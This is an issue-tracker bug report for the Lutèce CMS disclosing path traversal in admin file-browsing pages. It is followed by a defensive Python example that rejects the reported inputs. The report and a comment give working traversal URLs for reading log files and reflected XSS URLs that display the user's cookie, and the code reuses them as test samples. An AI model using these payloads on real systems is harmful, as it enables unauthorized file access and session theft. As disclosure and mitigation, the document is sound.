
Key: LUTECE-1133
Type: Bug
Status: Open
Priority: Major
Assignee: ILE
Reporter: Nicolas Gregoire
Votes: 0
Watchers: 1
Lutèce

Contributors and admins can browse directories and read files outside of the webroot

Created: 03/Feb/10 11:42 AM   Updated: 08/Feb/10 09:32 AM
Component/s: core
Affects Version/s: 2.3.3
Fix Version/s: 2.4.0

Time Tracking:
Not Specified

Environment: The issue isn't specific to any OS or software platform


Description

Under Windows, access is limited to the virtual drive on which Lutece is installed.
Under Unix, access depends on the privileges of the Tomcat user.

Browsing directories:
/jsp/admin/system/ManageFilesSytemDir.jsp?dir=/../../../../logs/

Reading files:
/jsp/admin/system/ViewFile.jsp?directory=/../../../../../logs/&file=error.log
/jsp/admin/system/ViewFile.jsp?directory=/&file=../../../../../logs/error.log

The impact is largest when Lutece is deployed on shared/hosted servers where Lutece contributors do not have sysadmin privileges.



Nicolas Gregoire added a comment - 03/Feb/10 02:43 PM

These pages can also be used to inject JavaScript code (aka a Cross Site Scripting attack).
The following URL will display the content of the user's cookie:

/jsp/admin/system/ManageFilesSytemDir.jsp?dir=/../../../../%00%3Chr%3EXSS%3Chr%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E%3Chr%3E

/jsp/admin/system/ViewFile.jsp?directory=%3Chr%3EXSS%3Chr%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E%3Chr%3E
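The two defects in this report (the `dir`/`directory`/`file` parameters being joined onto a filesystem path without any containment check, and a rejected parameter being reflected into the page unescaped, which is what the comment above exploits) can be closed by the same validation step. The following is an added example written for this page; it is not code from the Lutece project and not its 2.4.0 fix. `ALLOWED_ROOT`, `resolve_under_root`, `check_request`, `error_message_html` and the sample request list are assumptions constructed here; the parameter values in the samples are taken from the report.

```python
import html
import posixpath
import re
from urllib.parse import unquote

# Constructed assumption: the directory the admin file browser may expose.
# A real deployment would use an absolute path inside the webapp's own tree.
ALLOWED_ROOT = "/var/lib/tomcat/webapps/lutece/WEB-INF/files"

# Conservative allowlist for path parameters: letters, digits, '.', '_', '-', '/'.
# Traversal ('..') still passes this and is caught by the containment check
# below; markup characters such as '<' and '>' do not pass.
SAFE_PATH_CHARS = re.compile(r"^[A-Za-z0-9._/-]*$")


class PathRejected(ValueError):
    """Raised when a user-supplied path parameter must not be served."""


def resolve_under_root(directory: str, file: str = "", root: str = ALLOWED_ROOT) -> str:
    """Return the normalized path for (directory, file), or raise PathRejected.

    Steps: URL-decode once (a servlet container already does this; it is done
    here so the encoded URLs from the report can be fed in directly), reject
    NUL bytes, enforce the character allowlist, join under root, normalize
    '.' and '..' away, then require the result to still lie under root.
    posixpath is used so the result is the same on every platform.
    """
    raw = unquote(directory)
    if file:
        raw = raw + "/" + unquote(file)
    if "\x00" in raw:
        raise PathRejected("NUL byte in path parameter")
    if not SAFE_PATH_CHARS.match(raw):
        raise PathRejected("disallowed character in path parameter")
    # Leading slashes are stripped so the parameter cannot replace the root.
    candidate = posixpath.normpath(posixpath.join(root, raw.lstrip("/")))
    root_norm = posixpath.normpath(root)
    # Compare against root plus a separator so '/files2' is not accepted for '/files'.
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        raise PathRejected("path escapes the allowed root")
    # normpath is purely lexical; on a live filesystem, resolve symlinks
    # (os.path.realpath) before this comparison as well.
    return candidate


def error_message_html(param_value: str) -> str:
    """HTML fragment shown when a parameter is rejected.

    The value is reflected into the page, so it is escaped (quotes included);
    writing it back verbatim is what turns a rejected path into script injection.
    """
    return "<p>Invalid path parameter: " + html.escape(unquote(param_value), quote=True) + "</p>"


def check_request(directory: str, file: str = "") -> dict:
    """Simulate the admin page's handling of its 'directory' and 'file' parameters."""
    try:
        path = resolve_under_root(directory, file)
    except PathRejected as exc:
        return {"allowed": False, "reason": str(exc), "body": error_message_html(directory)}
    return {"allowed": True, "path": path}


# Constructed requests: one legitimate, then the parameter values quoted in the report.
SAMPLE_REQUESTS = [
    ("/docs", "readme.txt"),
    ("/../../../../logs/", ""),
    ("/../../../../../logs/", "error.log"),
    ("/", "../../../../../logs/error.log"),
    ("/../../../../%00%3Chr%3EXSS%3Chr%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E%3Chr%3E", ""),
    ("%3Chr%3EXSS%3Chr%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E%3Chr%3E", ""),
]

if __name__ == "__main__":
    for directory, file in SAMPLE_REQUESTS:
        print(repr(directory), repr(file), "->", check_request(directory, file))
```

Only the first sample resolves to a path; the traversal samples fail the containment check, the `%00` sample fails the NUL check before any filesystem call, and the markup samples fail the allowlist, with the rejected value escaped in the error body rather than written back as HTML.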